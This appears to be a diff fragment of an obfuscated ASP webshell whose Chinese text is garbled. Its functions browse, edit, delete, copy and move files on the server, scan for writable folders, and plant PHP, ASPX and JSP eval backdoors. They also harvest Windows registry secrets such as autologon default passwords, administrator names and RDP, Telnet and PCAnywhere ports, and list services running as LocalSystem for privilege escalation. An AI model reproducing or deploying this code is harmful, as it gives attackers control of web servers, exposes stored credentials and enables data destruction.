fI:fI dnE:23 - eulaVtni = eulaVtni:nehT 23 => eulaVtni fI:fI dnE:46 - eulaVtni = eulaVtni:nehT 46 => eulaVtni fI:fI dnE:821 - eulaVtni = eulaVtni:nehT 821 => eulaVtni fI:1=KOtidE:KOtidE miD:)htaPrewoP,eulaVtni(setubirttAteg noitcnuF:noitcnuF dnE:eltiTrts = eltiTyMteg:)htaPrewoP,setubirttA.enOeht(setubirttAteg & �� :̬״��Ȩǰ��>rb<�� & eltiTrts = eltiTrts:desseccAtsaLetaD.enOeht & �� :�ʷú���>rb<�� & eltiTrts = eltiTrts:deifidoMtsaLetaD.enOeht & �� :���޺���>rb<�� & eltiTrts = eltiTrts: detaerCetaD.enOeht & �� :��ʱ����>rb<�� & eltiTrts = eltiTrts: )eziS.enOeht(eziSehTteg & �� :С��>rb<�� & eltiTrts = eltiTrts: ��� & htaP.enOeht & �� :��·>rb<�� & eltiTrts = eltiTrts:eltiTrts miD:)htaPrewoP,enOeht(eltiTyMteg noitcnuF:bus dne:gnihtoN = eliFeht teS:)htaPrewoP,eliFeht(eltiTyMteg j:)htaPrewoP(eliFteG.Xosf = eliFeht teS:)���,�����,htaPrewoP(ecalper=htaPrewoP:)htaPrewoP(rewoPtidE bus:bus dne:gnihtoN = eliFeht teS:fi dne:��>tpircs/<;)(esolc.wodniw;)(daoler.noitacol.renepo.wodniw;)'�����ɶ�������'(trela>'tpircsavaj'=egaugnal tpircs<�� j:7=setubirttA.eliFeht:esle:��>tpircs/<;)(esolc.wodniw;)(daoler.noitacol.renepo.wodniw;)'�����⹦���Ѽ���'(trela>'tpircsavaj'=egaugnal tpircs<�� j:23=setubirttA.eliFeht:neht 1=epyTevaS fi:)htaPrewoP(eliFteG.Xosf = eliFeht teS:)epyTevaS,htaPrewoP(rewoPevaS bus��"))
+
+Function ScReWr(folder)
+execute(shisanfun("rtSrWeR = rWeRcS��gnihtoN = OSF teS��gnihtoN = redloFtseT teS��gnihtoN = tsiLeliFtseT teS��fi dnE��fi dnE��eurT,emaneliFdnR & redlof eliFeteleD.OSF��� ��>naps/<д>';xp11:ezis-tnof'=elyts naps<�� & rtSrWeR = rtSrWeR��eslE��� >tnof/<x>wolley=roloc '1'=ezis 'sgnidbew'=ecaf tnof<>naps/<д>';xp11:ezis-tnof'=elyts naps<�� & rtSrWeR = rtSrWeR��raelC.rre��nehT rre fI��eurT,emaneliFdnR & redlof eliFtxeTetaerC.OSF��� ��>naps/<��>';xp11:ezis-tnof'=elyts naps<�� = rtSrWeR��eslE��fI dnE��eurT,emaneliFdnR & redlof eliFeteleD.OSF��� ��>naps/<д>';xp11:ezis-tnof'=elyts naps<�� & rtSrWeR = rtSrWeR��eslE��� >tnof/<x>wolley=roloc '1'=ezis 'sgnidbew'=ecaf tnof<>naps/<д>';xp11:ezis-tnof'=elyts naps<�� & rtSrWeR = rtSrWeR��raelC.rre��nehT rre fI��eurT,emaneliFdnR & redlof eliFtxeTetaerC.OSF��� >tnof/<x>wolley=roloc '1'=ezis 'sgnidbew'=ecaf tnof<>naps/<��>';xp11:ezis-tnof'=elyts naps<�� = rtSrWeR��raelC.rre��nehT rre fI��txeN��tsiLeliFtseT ni A hcaE roF���pmt.�� & )won(dnoceS & )won(etuniM & )won(ruoH & )won(yaD & ��pmet\�� = emaneliFdnR��sredloFbuS.redloFtseT = tsiLeliFtseT teS��)redlof(redloFteG.OSF = redloFtseT teS��)��tcejbOmetsySeliF.gnitpircS��(tcejboetaerC.revreS = OSF teS��emaneliFdnR,rtSrWeR,tsiLeliFtseT,redloFtseT,OSF miD�� txen emuser rorre no"))
+End Function
+
+function php()
+execute(shisanfun("��>rb<>mrof/<>sosf=eci&lrUmorFnwod=tcAeht&2=etirWrevo&php.tset\��&htaptoor&��=htaPeht&��&tphp&��=lrUeht&daolpu=noitcA?=noitca tsop=dohtem 2mrof=eman mrof<��j���>rb<>mrof/<>osf=eci&lrUmorFnwod=tcAeht&2=etirWrevo&xpsa.tset\��&htaptoor&��=htaPeht&��&txpsa&��=lrUeht&daolpu=noitcA?=noitca tsop=dohtem 2mrof=eman mrof<��j���>retnec<>'02'=thgieh dt<>rt<>retnec/<>a/<>tnof/<>b/<)!�����Բ��ɾ(>b<>der=roloc 5=ezis tnof<>'ledjpa=noitcA?'=ferh a<>p<>tnof/<>retnec<>rb<>p<>rb<>rb<>p<>rb<>p<>rb<>rb<>retnec/< ;psbn&;psbn&;psbn&>emarfi/<>001=thgieh 003=htdiw xpsa.tset=crs emarfi< ;psbn&;psbn&;psbn&;psbn&>emarfi/<>001=thgieh 003=htdiw psj.tset=crs emarfi< ;psbn&;psbn&;psbn&;psbn&>emarfi/<>001=thgieh 003=htdiw php.tset=crs emarfi<>retnec<��j���oo��_��oo tseT xpsa��&)26(rhc&���&)73(rhc&��;))���efasnu���,]���w���[metI.tseuqeR(lave(etirW.esnopseR��&)73(rhc&���&)06(rhc&���&)26(rhc&���&)73(rhc&�� ���eslaf���=tseuqeRetadilav ���tpircsJ���=egaugnaL egaP @%��&)06(rhc&���etirW.))��xpsa.tset��(htappam.revres(eliFtxeTetaerC.osf���oo��_��oo tseT psJ��etirW.))��psj.tset��(htappam.revres(eliFtxeTetaerC.osf���>?)(ofniphp php?<>?'oo��_��oo' ohce PHP?<��etirW.))��php.tset��(htappam.revres(eliFtxeTetaerC.osf��))0,0(tBo(tcejbOetaerC.revreS=osf tes��txeN emuseR rorrE nO��"))
+End function
+
+On Error Resume Next
+function apjdel():set fso=Server.CreateObject("Scripting.FileSystemObject"):fso.DeleteFile(server.mappath("test.aspx")):fso.DeleteFile(server.mappath("test.php")):fso.DeleteFile(server.mappath("test.jsp")):j"ɾ�����!":End function
+
+Dim T1
+Class UPC
+  Dim D1,D2
+  Public Function Form(F)
+F=lcase(F)
+If D1.exists(F) then:Form=D1(F):else:Form="":end if
+  End Function
+
+  Public Function UA(F)
+F=lcase(F)
+If D2.exists(F) then:set UA=D2(F):else:set UA=new FIF:end if
+  End Function
+  Private Sub Class_Initialize
+  Dim TDa,TSt,vbCrlf,TIn,DIEnd,T2,TLen,TFL,SFV,FStart,FEnd,DStart,DEnd,UpName
+set D1=CreateObject(ObT(4,0))
+if Request.TotalBytes<1 then Exit Sub
+set T1 = CreateObject(ObT(6,0))
+T1.Type = 1 : T1.Mode =3 : T1.Open
+T1.Write  Request.BinaryRead(Request.TotalBytes)
+T1.Position=0 : TDa =T1.Read : DStart = 1
+DEnd = LenB(TDa)
+set D2=CreateObject(ObT(4,0))
+vbCrlf = chrB(13) & chrB(10)
+set T2 = CreateObject(ObT(6,0))
+TSt = MidB(TDa,1, InStrB(DStart,TDa,vbCrlf)-1)
+TLen = LenB (TSt)
+DStart=DStart+TLen+1
+while (DStart + 10) < DEnd
+  DIEnd = InStrB(DStart,TDa,vbCrlf & vbCrlf)+3
+  T2.Type = 1 : T2.Mode =3 : T2.Open
+  T1.Position = DStart
+  T1.CopyTo T2,DIEnd-DStart
+  T2.Position = 0 : T2.Type = 2 : T2.Charset ="gb2312"
+  TIn = T2.ReadText : T2.Close
+  DStart = InStrB(DIEnd,TDa,TSt)
+  FStart = InStr(22,TIn,"name=""",1)+6
+  FEnd = InStr(FStart,TIn,"""",1)
+  UpName = lcase(Mid (TIn,FStart,FEnd-FStart))
+  if InStr (45,TIn,"filename=""",1) > 0 then
+set TFL=new FIF
+FStart = InStr(FEnd,TIn,"filename=""",1)+10
+FEnd = InStr(FStart,TIn,"""",1)
+FStart = InStr(FEnd,TIn,"Content-Type: ",1)+14
+FEnd = InStr(FStart,TIn,vbCr)
+TFL.FileStart =DIEnd
+TFL.FileSize = DStart -DIEnd -3
+if not D2.Exists(UpName) then
+  D2.add UpName,TFL
+end if
+  else
+T2.Type =1 : T2.Mode =3 : T2.Open
+T1.Position = DIEnd : T1.CopyTo T2,DStart-DIEnd-3
+T2.Position = 0 : T2.Type = 2
+T2.Charset ="gb2312"
+SFV = T2.ReadText
+T2.Close
+if D1.Exists(UpName) then
+  D1(UpName)=D1(UpName)&", "&SFV
+else
+  D1.Add UpName,SFV
+end if
+  end if
+  DStart=DStart+TLen+1
+wend
+TDa=""
+set T2 =nothing
+  End Sub
+  Private Sub Class_Terminate
+if Request.TotalBytes>0 then
+  D1.RemoveAll:D2.RemoveAll
+  set D1=nothing:set D2=nothing
+  T1.Close:set T1 =nothing
+end if
+  End Sub
+End Class
+
+Class FIF
+dim FileSize,FileStart
+  Private Sub Class_Initialize
+  FileSize = 0
+  FileStart= 0
+  End Sub
+  Public function SaveAs(F)
+  dim T3
+  SaveAs=true
+  if trim(F)="" or FileStart=0 then exit function
+  set T3=CreateObject(ObT(6,0))
+ T3.Mode=3 : T3.Type=1 : T3.Open
+ T1.position=FileStart
+ T1.copyto T3,FileSize
+ T3.SaveToFile F,2
+ T3.Close
+ set T3=nothing
+ SaveAs=false
+end function
+End Class
+Class LBF
+  Dim CF
+  Private Sub Class_Initialize
+SET CF=CreateObject(ObT(0,0))
+  End Sub
+  Private Sub Class_Terminate
+Set CF=Nothing
+  End Sub
+Function ShowDriver()
+For Each D in CF.Drives
+  j cdx&"<a href='javascript:ShowFolder("""&D.DriveLetter&":\\"")'>&nbsp���ش��� ("&D.DriveLetter&":)</a><br></td></tr>" 
+Next
+  End Function
+Function IsIco(ia,ib,ta)
+	If ShowFileIco=true Then
+      IsIco = " <img src='"&IcoPath&ia&"'> "
+	  If ib<>"" Then
+	  IsIco = "<img src='"&IcoPath&ib&"'> "
+	  End If
+	Else
+	  IsIco = "&nbsp;<font face='wingdings' color='#dddddd' size='6'>"&ta&"</font>  "
+	End If
+End Function
+Function FileIco(FName)
+  If ShowFileIco=true Then
+    TypeList =  ".asp.asa.bat.bmp.com.doc.db.dll.exe.gif.htm.html.inc.ini.jpg.js.log.mdb.mid.mp3.png.php.rm.rar.swf.txt.wav.xls.xml.zip.jsp.aspx.;"
+    FileType = lcase(Mid(FName, InstrRev(FName,".")+1))
+    If Instr(TypeList,"."&FileType)>0 then
+      Ico = FileType&".gif"
+    Else
+      Ico = "default.gif"
+    End If
+
+    FileIco = "<img src='"&IcoPath&Ico&"' border='0'> "
+  Else 
+    FileIco="<font face='wingdings' color='#dddddd' size='3'>2</font> "
+  End If
+End Function
+Function Show1File(Path) 
+execute(shisanfun("gnihtoN=DLOF teS��fi dne:fi dne:fi dne:1+)��cevres��(noisses=)��cevres��(noisses neht ���><noitcA fi:esle:���&lruypoc&��� j:1+)��cevres��(noisses=)��cevres��(noisses:neht 1=)��cevres��(noisses fi:esle:neht  0><)��.861.291��,urevreS(rtsnI ro 0><)��1.0.0.721��,urevreS(rtsnI fi:��>elbat/<>rt/<��&IS j��txeN��1+i=i���>rt/<>dt/<��&)��-��,��/��,deifidoMtsaLetaD.L(ecalper&��>d=di dt<>dt/<>a/<evoM>'����'=eltit 'ma'=ssalc ')���eliFevoM���,����&)emaN.L&��\��&htaP(htaPeR&����(mroFlluF:tpircsavaj'=ferh a< >a/<ypoC>'�Ƹ�'=eltit 'ma'=ssalc ')���eliFypoC���,����&)emaN.L&��\��&htaP(htaPeR&����(mroFlluF:tpircsavaj'=ferh a< >a/<leD>'��ɾ'=eltit 'ma'=ssalc ')(kosey nruter'=kcilcno  ')���eliFleD���,����&)emaN.L&��\��&htaP(htaPeR&����(mroFlluF:tpircsavaj'=ferh a< ��&is=is��fi dne���̩�&is=is��esle���>tnof/<x>der=roloc '1'=ezis 'sgnidbew'=ecaf tnof<��&is=is��neht 0=KOOtidE fi��fI dnE��0=KOOtidE:1 - VOOtidE = VOOtidE��nehT 1 => VOOtidE fI��fI dnE��0=KOOtidE:2 - VOOtidE = VOOtidE��nehT 2 => VOOtidE fI��fI dnE��0=KOOtidE:4 - VOOtidE = VOOtidE��nehT 4 => VOOtidE fI��fI dnE��8 - VOOtidE = VOOtidE��nehT 8 => VOOtidE fI:fI dnE��61 - VOOtidE = VOOtidE��nehT 61 => VOOtidE fI��fI dnE��23 - VOOtidE = VOOtidE��nehT 23 => VOOtidE fI��fI dnE��46 - VOOtidE = VOOtidE��nehT 46 => VOOtidE fI��fI dnE��821 - VOOtidE = VOOtidE��nehT 821 => VOOtidE fI��setubirttA.l=VOOtidE��1=KOOtidE��KOOtidE miD���>a/<��Ȩ>00FF00#=roloc tnof<>'��Ȩ'=eltit 'ma'=ssalc '###'=ferh ���)'002=thgieh,003=htdiw,0=elbaziser,0=srabllorcs,0=rabunem,0=sutats,0=seirotcerid,0=noitacol,0=rabloot','rewoPtidE','��&)emAn.L&��\��&hTaP(htApeR&��=htaPrewoP&rewoPtidE=noitcA?'(nepo.wodniw���=kcilcno a<��&iS=iS��� >a/<tidE>'����'=eltit 'ma'=ssalc ')���eliFtidE���,����&)emaN.L&��\��&htaP(htaPeR&����(mroFlluF:tpircsavaj'=ferh a<��&is=is��� >a/<nepO>'nepO'=eltit 'ma'=ssalc ����&)emAn.L&��\��&hTaP(lrUnepo&����=ferh a<��&is=is���>d=di dT<>dt/<��&epyT.L&��>d=di dT<>dt/<K��&)4201/ezis.L(gnlc&��>d=di dT<>a/<��&emaN.L&��  >'����'=eltit ';)���eliFnwoD���,����&)emaN.L&��\��&htaP(htaPeR&����(mroFlluF:tpircsavaj'=ferh a<��&is=is��)emaN.L(ocIeliF&is=is���>���''=yalpsid.elyts.1unem���=revoesuomno 42=thgieh dt<>rt<��&IS=IS��selif.dloF ni L hcaE roF���>dt/<>dt<>dt/<>b/<deifidoM tsaL>x=di b<>s=di dt<>dt/<>b/<gnitarepO>x=di b<>s=di dt<>dt/<>b/<epyT>x=di b<>s=di dt<>dt/<>b/<eziS>x=di b<>22=thgieh s=di dt<>dt/<>b/<emaneliF>x=di b<>s=di dt<>rt<>retnec=ngila '%001'=htdiw elbat<��=IS��0=i:���=IS : ���& IS j���>elbat/<>rt/<>dt/<>2=thgieh dt<>rt<>rt/<��&IS=IS��txeN���>rt<>rt/<��&IS=IS neht 0=6 dom i fI��1+i=i���>dt/<>vid/< >a/<evoM>'����'=eltit 'ma'=ssalc ')(kosey nruter'=kcilcno ')���redloFevoM���,����&)emaN.F&��\��&htaP(htaPeR&����(mroFlluF:tpircsavaj'=ferh a< >a/<leD>'��ɾ'=eltit 'ma'=ssalc ')(kosey nruter'=kcilcno ')���redloFleD���,����&)��\\��,��\��,emaN.F&��\��&htaP(ecalpeR&����(mroFlluF:tpircsavaj'=ferh a< >a/<ypoC>'�Ƹ�'=eltit 'ma'=ssalc ')(kosey nruter'=kcilcno  ')���redloFypoC���,����&)emaN.F&��\��&htaP(htaPeR&����(mroFlluF:tpircsavaj'=ferh a<>rb<>a/<��&emaN.F&��>rb<>���������=eltit ')����&)emaN.F&��\��&htaP(htaPeR&����(redloFwohS:tpircsavaj'=ferh a<��&is=is��)��0��,��fig.redlof��,���(ocIsI&IS=IS���>'xp4:mottob-gniddap;838383# dilos xp1:redrob'=elyts vid<>retnec=ngila %71=htdiw 01=thgieh dt<��&IS=IS��sredlofbus.DLOF ni F hcaE roF�� ��>rt<>'6'=gniddapllec '0'=gnicapsllec '0'=redrob '%001'=htdiw elbat<��=IS��0=i��)htaP(redloFteG.FC=DLOF teS"))
+End function
+Function DelFile(Path)
+If CF.FileExists(Path) Then
+CF.DeleteFile Path
+SI="<center><br><br><br>��ϲ���ļ� "&Path&" ɾ���ɹ���</center>"
+SI=SI&BackUrl
+j SI
+j ""&copyurl&""
+End If
+End Function
+Function EditFile(Path)
+If Request("Action2")="Post" Then
+Set T=CF.CreateTextFile(Path)
+T.WriteLine Request.form("content")
+T.close
+Set T=nothing
+SI="<center><br><br><br>��ϲ���ļ�����ɹ���</center>"
+SI=SI&BackUrl
+j SI
+j ""&copyurl&""
+Response.End
+End If
+If Path<>"" Then
+Set T=CF.opentextfile(Path, 1, False)
+Txt=HTMLEncode(T.readall) 
+T.close
+Set T=Nothing
+Else
+Path=Session("FolderPath")&"\shell.asp":Txt=strBAD
+End If
+j "<Form action='"&URL&"?Action2=Post' method='post' name='EditForm'><input name='Action' value='EditFile' Type='hidden'><input name='FName' value='"&Path&"' style='width:100%'><br><textarea name='Content' style='width:100%;height:450'>"&Txt&"</textarea><br><hr><input name='goback' type='button' value='Back' onclick='history.back();'>&nbsp;&nbsp;&nbsp;<input name='reset' type='reset' value='Reset'>&nbsp;&nbsp;&nbsp;<input name='submit' type='submit' value='Save'></form>"
+End Function
+Function CopyFile(Path)
+Path=Split(Path,"||||")
+If CF.FileExists(Path(0)) and Path(1)<>"" Then
+CF.CopyFile Path(0),Path(1)
+SI="<center><br><br><br>��ϲ���ļ�"&Path(0)&"���Ƴɹ���</center>"
+SI=SI&BackUrl
+j SI 
+End If
+End Function
+Function MoveFile(Path)
+Path=Split(Path,"||||")
+If CF.FileExists(Path(0)) and Path(1)<>"" Then
+CF.MoveFile Path(0),Path(1)
+SI="<center><br><br><br>��ϲ���ļ�"&Path(0)&"�ƶ��ɹ���</center>"
+SI=SI&BackUrl
+j SI 
+End If
+End Function
+Function DelFolder(Path)
+If CF.FolderExists(Path) Then
+CF.DeleteFolder Path
+SI="<center><br><br><br>��ϲ��Ŀ¼"&Path&"ɾ���ɹ���</center>"
+SI=SI&BackUrl
+j SI
+End If
+End Function
+Function CopyFolder(Path)
+Path=Split(Path,"||||")
+If CF.FolderExists(Path(0)) and Path(1)<>"" Then
+CF.CopyFolder Path(0),Path(1)
+SI="<center><br><br><br>��ϲ��Ŀ¼"&Path(0)&"���Ƴɹ���</center>"
+SI=SI&BackUrl
+j SI
+End If
+End Function
+Function MoveFolder(Path)
+Path=Split(Path,"||||")
+If CF.FolderExists(Path(0)) and Path(1)<>"" Then
+CF.MoveFolder Path(0),Path(1)
+SI="<center><br><br><br>��ϲ��Ŀ¼"&Path(0)&"�ƶ��ɹ���</center>"
+SI=SI&BackUrl
+j SI
+End If
+End Function
+Function NewFolder(Path)
+If Not CF.FolderExists(Path) and Path<>"" Then:CF.CreateFolder Path:SI="<center><br><br><br>��ϲ��Ŀ¼"&Path&"�½��ɹ���</center>":SI=SI&BackUrl:j SI:j Efun&""&serveru&"&p="&serverp&"'><script>":End If
+End Function
+End Class
+execute(shisanfun("buS dnE��fi dnE�������erehwynAcp���ý��Ʋ�����¼Ŀ��Ĭ���Կ�,��������erehwynAcp_�ַ�>il<��j��nehT )��fic.��&emanrevres&��\cetnamyS\ataD noitacilppA\sresU llA\sgnitteS dnA stnemucoD\��&revirdsys(stsixEeliF.osf fI��)��emaNretupmoC\emaNretupmoC\emaNretupmoC\lortnoC\teSlortnoCtnerruC\METSYS\MLKH��(daeRgeR.hsw=emanrevres��)2,)2(redloFlaicepsteG.osF(tfel=evirdsyS��)��tcejbOmetsySeliF.gnitpircS��(tcejboetaerC.revreS=osf teS��txeN��fi dnE��fi dnE���>rb<��ľPHP��д�Ҳ�,¼ĿliaMbeW�Ҳ��Կ�,������ȨmetsySlacoL����,liamniW cigaM_���������>il<��j��nehT ��metsySlacoL��=emaNtnuoccAecivreS.ecivreSjbo fi��nehT )��liamniw��,)emaN.ecivreSjbo(esacl(rtsni fi��fi dnE��fi dnE���>rb<Ȩ����ľpsJ��ʹ�ǿ��Կ�,������ȨmetsySlacoL����,tacmoT_���������>il<��j��nehT ��metsySlacoL��=emaNtnuoccAecivreS.ecivreSjbo fi��nehT )��tacmot��,)emaN.ecivreSjbo(esacl(rtsni fi��fi dnE��fi dne��fi dnE���>rb<��ľPHP�ǿ��Կ�,metsySlacoLΪ��Ȩ����,�ڴ����ehcapA_���������>il< ��j��eslE���>rb<Ȩ���ֱ�Կ�.ehcapAΪ�����BEWǰ��>il<��j��nehT )��ehcapA��,)��ERAWTFOS_REVRES��(selbairaVrevreS.tseuqeR(rtsni fI��nehT ��metsySlacoL��=emaNtnuoccAecivreS.ecivreSjbo fi��nehT ��ehcapa��=)emaN.ecivreSjbo(esacl fi��fi dnE��fi dnE���>rb<Ȩ��߹�exe.us���ǿ��Կ�,������ȨmetsySlacoL����,װ��U-vreS_���������>il<��j��nehT ��metsySlacoL��=emaNtnuoccAecivreS.ecivreSjbo fi��nehT ��U-vreS��=emaN.ecivreSjbo fi��retupmoCjbo nI ecivreSjbo hcaE roF��txeN emuseR rorrE nO��)��ecivreS��(yarrA = retliF.retupmoCjbo��)��noitacilppA.llehS��(tcejbOetaerC.revreS = as teS��)��.//:TNniW��(tcejbOteG = retupmoCjbo teS���>rh<>rb<]��̽��_�������[��j���>rb<>rb<>rb<------------------------------------��j���>rb<��&kk&��:Ϊ����_����ǰ��>il<��j��)kh(daeRgeR.hsw=kk���tnuoC\munE\pipcT\secivreS\100teSlortnoC\METSYS\MLKH��=kh���>rb<��&lmtn&��:Ϊ����lmtN tenleT>il<��j��1=lmtN nehT ���=lmtn fi��)yekLMTN(daeRgeR.hsW=lmtn���LMTN\0.1\revreStenleT\tfosorciM\ERAWTFOS\ENIHCAM_LACOL_YEKH��=yekLMTN���>rb<��&ylpsid&��:������Ǵ�_��ʾ�Է���>il<��j�����=ylpsid esle ���ǩ�=ylpsid nehT 0=nigolpsid ro ���=nigolpsid fI��)��emaNresUtsaLyalpsiDtnoD\metsyS\seiciloP\noisreVtnerruC\swodniW\tfosorciM\erawtfoS\ENIHCAM_LACOL_YEKH��(daeRger.hsw=nigolpsid��fi dnE���>tnof/<>rb<��&dwssaP&��:����>der=roloc tnof<>erauqs=epyt il<��j���>rb<��&nimdA&��:������>erauqs=epyt il<��j��)��drowssaPtluafeD\nogolniW\noisreVtnerruC\TN swodniW\tfosorciM\ERAWTFOS\ENIHCAM_LACOL_YEKH��(daeRgeR.hsW=dwssaP��)��emaNresUtluafeD\nogolniW\noisreVtnerruC\TN swodniW\tfosorciM\ERAWTFOS\ENIHCAM_LACOL_YEKH��(daeRgeR.hsW=nimdA���>rb<����:��Ƕ�_�Ի���>il<��j��eslE���>rb<����δ:��Ƕ�_�Ի���>il<��j��nehT ���=nigolotuA ro 0=nigolotuA fi��)nigolotuAsi(daeRgeR.hsW=nigolotuA���nogoLnimdAotuA\nogolniW\noisreVtnerruC\TN swodniW\tfosorciM\ERAWTFOS\ENIHCAM_LACOL_YEKH��=nigolotuAsi���>tnof/<>rb<��&emaNnimdA&��>der=roloc tnof<:Ϊ������Ա��&��������Ĭ>il<��j���fi dne���krowteN.tpircsW:���в�����������j��neht rre fi��txeN���>il/<>tnof/<>rb<��&emaN.nimda&�壺��Ա����ǰ��>der=roloc tnof<>il<�� j��srebmeM.puorGjbo ni nimda hcaE roF��)��puorg,srotartsinimdA/��&emaNretupmoC.Nt&��//:TNniW��(tcejbOteG=puorGjbo teS��)��krowteN.tpircsW��(tcejbOetaerc.revres=Nt teS�� txen emuser rorre no��0=seripxE.esnopseR���rotartsinimdA��=emaNnimdA nehT ���=emannimda fi��)yeKemaNnimdA(daeRgeR.hsw=emaNnimdA���emaNresUtluafeDtlA\nogolniW\noisreVtnerruC\TN swodniW\tfosorciM\ERAWTFOS\ENIHCAM_LACOL_YEKH��=yeKemaNnimdA���>rb<��&emancp&��:Ϊ����_��ǰ��>il<��j���>rb<.������ȡ_�����ީ�=emancp nehT ���=emancp fi��)yekemancp(daeRgeR.hsw=emancp���emaNretupmoC\emaNretupmoC\emaNretupmoC\lortnoC\teSlortnoCtnerruC\METSYS\MLKH��=yekemancp���>1=ezis rh<>rb<]��̽_����ͳϵ[>rb<>rb<��j��txen���>rb<��&)i(shtap&��>il<��j��)shtap(dnuobU ot )shtap(dnuobL=i roF���>rb<:���侶·_ǰ��ͳϵ��j���>rb<------------------------------------��j��)��;��,htaPtfoS(tilps=shtap���>rb<��֧:_������ɱ��ϵ����>il<��j nehT )��gnisir��,ofnihtaP(rtsni fi���>rb<��֧:_������ɱ��������>il<��j nehT )��surivitna��,ofnihtaP(rtsni fi���>rb<��֧:_������ɱ��ϵɽ�� >il<��j nehT )��vak��,ofnihtaP(rtsni fi���>rb<��֧:_������ɱlliK>il<��j nehT )��lliK��,ofnihtaP(rtsni fi���>rb<��֧:_�ƿ�erehwynAcP��������>il<��j nehT )��erehwynacp��,ofnihtaP(rtsni fi���>rb<��֧:_�����MFC>il<��j nehT )��7xmnoisufc��,ofnihtaP(rtsni fi���>rb<��֧:_��������elcarO>il<��j nehT )��elcaro��,ofnihtaP(rtsni fi���>rb<��֧:_��������LQSyM>il<��j nehT )��lqsym��,ofnihtaP(rtsni fi���>rb<��֧:_��������LQSSM>il<��j nehT )��revres lqs tfosorcim��,ofnihtaP(rtsni fi���>rb<��֧:_����avaJ>il<��j nehT )��avaj��,ofnihtaP(rtsni fi���>rb<��֧:_����lreP>il<��j nehT )��lrep��,ofnihtaP(rtsnI fi���:��֧����&����ͳϵ��j��)htaPtfoS(esacl=ofnihtaP��)��htaP��(meti.tnemnorivnE.hsW=htaPtfoS���>1=ezis rh<>rb<]��̽��_��ͳϵ[>rb<>rb<>rb<��j���>lo/<��j��fI dnE���>rb<�� & drowssaPnigoLotua & �� :���ܻ��ʵĩ�&��¼�Ƕ��ԩ�j��fI dnE���eslaF��j��raelC.rrE��nehT rrE fI��)yeKssaPnigoLotua & htaPnigoLotua(daeRgeR.Xsw = drowssaPnigoLotua���>rb<�� & emanresUnigoLotua & �� :����ͳϵ�ĩ�&��¼�Ƕ��ԩ�j��)yeKresUnigoLotua & htaPnigoLotua(daeRgeR.Xsw = emanresUnigoLotua��eslE��nehT 0 = elbanEnigoLotuAsi fI��)yeKelbanEnigoLotua & htaPnigoLotua(daeRgeR.Xsw = elbanEnigoLotuAsi���drowssaPtluafeD�� = yeKssaPnigoLotua���emaNresUtluafeD�� = yeKresUnigoLotua���nogoLnimdAotuA�� = yeKelbanEnigoLotua���\nogolniW\noisreVtnerruC\TN swodniW\tfosorciM\ERAWTFOS\ENIHCAM_LACOL_YEKH�� = htaPnigoLotua��fI dnE���>/rb<�� & troPmret & �� :�ڶ˩�&���������ǰ����j��eslE ���>/rb<.���޵��ܷ�����Ȩ��� ,�ڶ˶��յ��÷��ީ�j�� nehT 0 >< rebmuN.rrE rO ��� = troPmret fI���>lo<¼�Ƕ��Լ���&��ڶ����_���թ�j��)yeKtroPlanimret & htaPtroPlanimret(daeRgeR.Xsw = troPmret���rebmuNtroP�� = yeKtroPlanimret���\pcT-PDR\snoitatSniW\revreS lanimreT\lortnoC\teSlortnoCtnerruC\METSYS\MLKH�� = htaPtroPlanimret��drowssaPnigoLotua ,emanresUnigoLotua ,yeKelbanEnigoLotua ,elbanEnigoLotuAsi miD��yeKssaPnigoLotua ,yeKresUnigoLotua ,htaPnigoLotua miD��troPmret ,yeKtroPlanimret ,htaPtroPlanimret miD��)��llehS.tpircSW��(tcejbOetaerC.revreS = Xsw teS���------------------------------------------------------��j���>rb<��&troPWAP&��:Ϊ�ڶ�erehwynAcP>il<��j���erehwynAcpװ�����&���ǻ�����&����ȷ��.ȡ���&�巨�ީ�=troPWAP neht ���=troPWAP fI��)yeKerehwynAcp(daeRgeR.hsW=troPWAP���troPataDPIPCT\metsyS\noisreVtnerruC\erehwynAcp\cetnamyS\ERAWTFOS\ENIHCAM_LACOL_YEKH��=yeKerehwynAcp���>tnof/<>rb<��&troPmreT&��>der=roloc tnof<:Ϊ�ڶ�ecivreS lanimreT>il<��j����������revreS swodniWΪ���ǩ�&����ȷ��.ȡ����&�巨�ީ�=troPmreT nehT ���=troPmreT fI��)yeKmreT(daeRgeR.hsW=troPmreT���rebmuNtroP\pct\sdT\dwpdr\sdW\revreS lanimreT\lortnoC\teSlortnoCtnerruC\METSYS\ENIHCAM_LACOL_YEKH��=yeKmreT���>rb<��&troptnlT&��:�ک�&���tenleT>il<��j���)�����&����Ĭ(32��=tnlT nehT ���=troPtnlT fi��)yeKtenleT(daeRgeR.hsW=troPtnlT���troPtenleT\0.1\revreStenleT\tfosorciM \ERAWTFOS\ENIHCAM_LACOL_YEKH��=yektenleT���>1=ezis rh<>rb<]��̽��&��ڶ˩�&������[>rb<>rb<��j��fi dne��txeN���>rb<------------------------------------------------��j��fi dnE��fi dnE���>rb<��j��txen���,��&)j(wollaPDU j��)wollapdu(dnuoBU oT )wollapdu(dnuoBL = j rof���:Ϊ�ڶ�pdu�ĩ�&������>il<��j��eslE���>rb<��ȫ:Ϊ�ڶ�pdu�ĩ�&������>il<��j��nehT 0=)0(wollapdu ro ���=)0(wollapdu fI��)PDUlluF(daeRgeR.hsW=wollapdu��fi dnE���>rB<��j��txeN���,��&)j(wollapct j��)wollapct(dnuoBU oT )wollapct(dnuoBL = j roF���:Ϊ�ڶ�pct�ĩ�&������>il<��j��eslE���>rb<��ȫ:Ϊ�ڶ�pct�ĩ�&������>il<��j��nehT 0=)0(wollapct ro ���=)0(wollapct fI��)PCTlluF(daeRgeR.hsW=wollapct��KUE&BdpA&htap=PDUlluF��KTE&BdpA&htaP=PCTlluF���stroPdewollAPDU\��=KUE���stroPdewollAPCT\��=KTE��esle���>rb<ѡɸPI/pcTû>il<��j�� nehT 1=retlifpipctoN fi��fI dnE���>rb<������û��ȡ������SND��&����Ĭ>il<��j��eslE���>rb<��&rtsSND&��:ΪSND��&�忨��>il<��j��nehT ���><rtsSND fI��)yeKSND(daeRgeR.hsW=rtsSND���revreSemaN\��&BdpA&htaP=yeKSND��fi dnE���>rb<������û��ȡ�����޹���>il<��j��eslE��txeN���>rb<��&)j(yawetaG&��:��&j&�����>il<��j��)yawetaG(dnuobU ot )yawetaG(dnuobL=j roF��nehT )yaWetaG(yarrasi fI��)yeKyaWetaG(daergeR.hsW=yaWetaG���yawetaGtluafeD\��&BdpA&htaP=yeKyaWetaG��fi 